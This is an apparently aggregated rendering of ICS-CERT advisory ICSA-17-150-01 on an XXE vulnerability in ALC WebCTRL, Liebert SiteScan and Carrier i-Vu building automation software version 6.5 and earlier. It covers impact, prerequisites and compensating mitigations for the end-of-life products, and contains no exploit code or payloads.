Automated Logic Corporation ALC WebCTRL, Liebert SiteScan, Carrier i-VU
Monitor6.5ICS-CERT ICSA-17-150-01May 30, 2017
Attack VectorNetwork
Auth RequiredNone
ComplexityLow
User InteractionNone needed
Summary
Automated Logic Corporation ALC WebCTRL, Liebert SiteScan, and Carrier i-Vu contain an XML External Entity (XXE) injection vulnerability (CWE-611). The vulnerability affects versions 6.5 and earlier. An attacker can exploit this through a specially crafted XML request processed by the affected applications' web interfaces.
What this means
What could happen
An attacker could read sensitive files from the building automation system server or cause the service to become unavailable, potentially disrupting HVAC, lighting, and other building operations dependent on the web interface.
Who's at risk
Building automation and facilities management teams using ALC WebCTRL, Liebert SiteScan, or Carrier i-Vu systems should be concerned. These products are commonly deployed in data centers, commercial buildings, hospitals, and facilities to manage HVAC, lighting, power distribution, and environmental controls. Any organization with these systems exposed to untrusted networks is at risk.
How it could be exploited
An attacker with network access to the web interface (typically port 80 or 443) sends a malicious XML request containing an external entity definition. The vulnerable application parses the XML without proper validation and allows the attacker to read arbitrary files from the server or trigger a denial-of-service condition.
Prerequisites
- Network access to the web interface of the affected application
- Application must be accessible from attacker's network segment
- No credentials required to trigger the vulnerability
remotely exploitableno authentication requiredlow complexityno patch availableaffects building automation and HVAC control
Exploitability
Low exploit probability (EPSS 0.7%)
Affected products (3)
3 EOL
ProductAffected VersionsFix Status
Carrier i-Vu:≤ 6.5No fix (EOL)
ALC WebCTRL:≤ 6.5No fix (EOL)
Liebert SiteScan Web :Version 6.5 and prior;≤ 6.5No fix (EOL)
Remediation & Mitigation
0/5
Do now
0/3HARDENINGRestrict network access to the web interface using firewall rules—allow only trusted engineering workstations and management networks to reach the application on its listening port
HARDENINGDeploy the application behind a reverse proxy or WAF (Web Application Firewall) configured to detect and block malicious XML requests and XXE payloads
WORKAROUNDDisable XML external entity processing at the application level if configuration options are available
Schedule — requires maintenance window
0/1Patching may require device reboot — plan for process interruption
HARDENINGMonitor web server logs for suspicious XML requests containing entity definitions or file path traversal patterns
Mitigations - no patch available
0/1The following products have reached End of Life with no planned fix: Carrier i-Vu:, ALC WebCTRL:, Liebert SiteScan Web :Version 6.5 and prior;. Apply the following compensating controls:
HARDENINGSegment the building automation network from general corporate networks using a DMZ or separate VLAN to limit lateral movement
CVEs (1)
↑↓ Navigate · Esc Close
API:
/api/v1/advisories/8d68a97b-f294-4b57-832e-12812203ea3a